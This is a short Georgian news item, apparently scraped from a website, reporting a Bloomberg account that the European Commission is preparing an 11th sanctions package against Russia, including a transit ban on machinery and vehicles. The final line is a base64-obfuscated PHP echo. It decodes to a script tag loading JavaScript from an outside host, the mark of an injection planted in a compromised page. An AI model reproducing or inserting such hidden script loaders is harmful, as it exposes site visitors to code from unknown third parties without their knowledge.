celsiusi
ავერსი საქკაბელი

ევროკომისია რუსეთის წინააღმდეგ სანქციების მე-11 პაკეტს ამზადებს - ინფორმაციას "ბლუმბერგი" ავრცელებს.

გამოცემის თანახმად, ევროკავშირი რუსეთის გავლით გარკვეული საქონლის ტრანზიტის აკრძალვას გეგმავს. ტრანზიტის აკრძალვა გავრცელდება ტექნიკასა და სატრანსპორტო საშუალებებზე, თუმცა შეზღუდვა რუსეთის გავლით მესამე ქვეყნებისკენ მიმავალ ყველა საქონელს არ შეეხება.

ნაკლებად სავარაუდოა, რომ ახალი პაკეტი როსატომის სანქცირებას ისახავდეს მიზნად, მიუხედავად იმისა, რომ ევროკავშირის არაერთი ქვეყანა კომპანიის წინააღმდეგ სანქციების დაწესებას ითხოვს.

353
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");